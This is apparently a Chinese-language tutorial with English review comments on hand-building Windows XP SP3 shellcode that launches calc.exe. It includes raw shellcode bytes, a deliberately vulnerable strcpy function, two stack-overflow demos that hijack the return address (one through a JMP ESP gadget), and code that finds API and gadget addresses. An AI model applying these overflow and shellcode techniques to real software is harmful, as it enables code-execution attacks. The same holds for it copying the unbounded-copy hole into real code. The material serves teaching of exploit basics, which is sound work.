Shellcode的简单取得
以弹出计算器为例
.c
/* Reference behaviour that every block below reproduces: start calc.exe
 * through the CRT and terminate. The later blocks reach these same two
 * calls by hard-coded address instead of by name. */
system("calc.exe"); exit(0);
.asm
/* MSVC inline-assembly form of the two calls above. It builds the strings
 * "msvcrt.dll" and "calc.exe" on the stack, then calls LoadLibraryA, system
 * and exit through absolute addresses (the system/exit values are the ones
 * printed in the "XP SP3" section below). NOTE(review): those addresses are
 * only meaningful for the exact DLL builds they were read from; the curly
 * quotes around the character constants (‘l‘, ‘d.tr‘, ...) are mis-encoded
 * plain single quotes. */
__asm {
    xor eax, eax
    push eax
    mov byte ptr [esp], ‘l‘
    mov byte ptr [esp+1], ‘l‘
    push ‘d.tr‘
    push ‘cvsm‘              // stack now holds "msvcrt.dll" + 2 zero bytes (12 bytes)
    mov eax, esp
    push eax                 // argument: address of "msvcrt.dll"
    mov eax, 7c801d7bh       // LoadLibraryA, hard-coded address
    call eax
    xor eax, eax
    push eax
    push ‘exe.‘
    push ‘clac‘              // stack now holds "calc.exe" + 4 zero bytes (12 bytes)
    mov eax, esp
    push eax                 // argument: address of "calc.exe"
    mov eax, 77BF93C7h       // system, hard-coded address
    call eax
    xor eax, eax
    push eax                 // argument: 0
    mov eax, 77C09E7Eh       // exit(0), hard-coded address
    call eax
}
ShellCode
/* The assembly above as raw x86 machine code (65 bytes plus the terminating
 * NUL). It lives in a writable data array and is invoked through a function
 * pointer, so it can only run where data pages are executable.
 * NOTE(review): DEP/NX refuses exactly this, and the embedded addresses are
 * the XP SP3 values from below, so the bytes are not portable. */
unsigned char uc[] =
    "\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E"
    "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0"
    "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50"
    "\xB8\xC7\x93\xBF\x77\xFF\xD0\x33\xC0\x50\xB8\x7E\x9E\xC0\x77\xFF"
    "\xD0";
typedef void (*FUNC)();   // view the byte array as a function with no arguments
((FUNC)&uc)();            // transfer control into the data array
Stack Overflow 1
/* Deliberately vulnerable helper: an unbounded strcpy into a 10-byte stack
 * buffer. Any source longer than 9 characters overruns `buf`, and a long
 * enough one reaches the saved return address further up the frame. A
 * size-bounded copy (snprintf(buf, sizeof buf, "%s", s)) or /GS stack
 * cookies would stop this demo. */
void func1(char* s)
{
    char buf[10];
    strcpy(buf, s);
}
char ch[] = "0123456789123456";   // 16 bytes, a multiple of 4
DWORD* pEIP = (DWORD*)&ch[12];    // offset of the saved return address: +12 in release, +16 in debug
*pEIP = (DWORD)uc;                // make the return address point at the shellcode array above
func1(ch);
ShellCode Overflow 2
/* Variant that does not need the absolute address of the shellcode array:
 * after 16 bytes of filler the return address is overwritten with
 * 0x77D29353 (little-endian \x53\x93\xD2\x77), the FF E4 / JMP ESP location
 * that the user32.dll scan below prints, and the shellcode bytes follow it.
 * NOTE(review): the value is tied to that XP SP3 user32.dll build; ASLR
 * moves it and DEP blocks executing the stack, so both assumptions fail on
 * current systems. */
HMODULE hMod = LoadLibrary("user32.dll");   // presumably keeps user32.dll mapped for the address above
unsigned char uc[] =
    "1234567890123456\x53\x93\xD2\x77\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E"
    "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0"
    "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50"
    "\xB8\xC7\x93\xBF\x77\xFF\xD0\x33\xC0\x50\xB8\x7E\x9E\xC0\x77\xFF"
    "\xD0";
func1((char*)uc);   // same unbounded strcpy as in the first overflow
XP SP3 相关地址取得
/* Where the constants used above come from, measured on Windows XP SP3.
 * These are two independent snippets: both declare `hMod`, so they do not
 * compile in a single scope. NOTE(review): the printed values are specific to
 * these DLL builds; with ASLR they differ per boot, which is what makes
 * hard-coded addresses unreliable. */
HMODULE hMod = LoadLibrary("msvcrt.dll");
if (hMod) {
    printf("%p\r\n", GetProcAddress(hMod, "system")); // 77BF93C7
    printf("%p\r\n", GetProcAddress(hMod, "exit"));   // 77C09E7E
    FreeLibrary(hMod);
}

/* Second snippet: linear scan of the mapped user32.dll image for the byte
 * pair FF E4 (JMP ESP). The loop has no length bound; it only stops on the
 * first match or when an exception is caught (try/catch(...) is C++, not C;
 * in a C file this would need __try/__except). */
HMODULE hMod = LoadLibrary("user32.dll");
if (hMod) {
    PBYTE pTravel = (PBYTE)hMod;
    BOOL bLoop = TRUE;
    for (DWORD i = 0; bLoop; i++) {
        // Opcode reference for the pattern searched below:
        // FF E0 JMP EAX   FF E1 JMP ECX   FF E2 JMP EDX   FF E3 JMP EBX
        // FF E4 JMP ESP   FF E5 JMP EBP   FF E6 JMP ESI   FF E7 JMP EDI
        // FF D0 CALL EAX  FF D1 CALL ECX  FF D2 CALL EDX  FF D3 CALL EBX
        // FF D4 CALL ESP  FF D5 CALL EBP  FF D6 CALL ESI  FF D7 CALL EDI
        try {
            if(pTravel[i] == 0xFF && pTravel[i+1] == 0xE4) {
                printf("%p\r\n", pTravel + i); // 77D29353
                break;
            }
        } catch(...) {
            bLoop = FALSE;   // reading past the mapping raised an exception: give up
        }
    }
    FreeLibrary(hMod);
}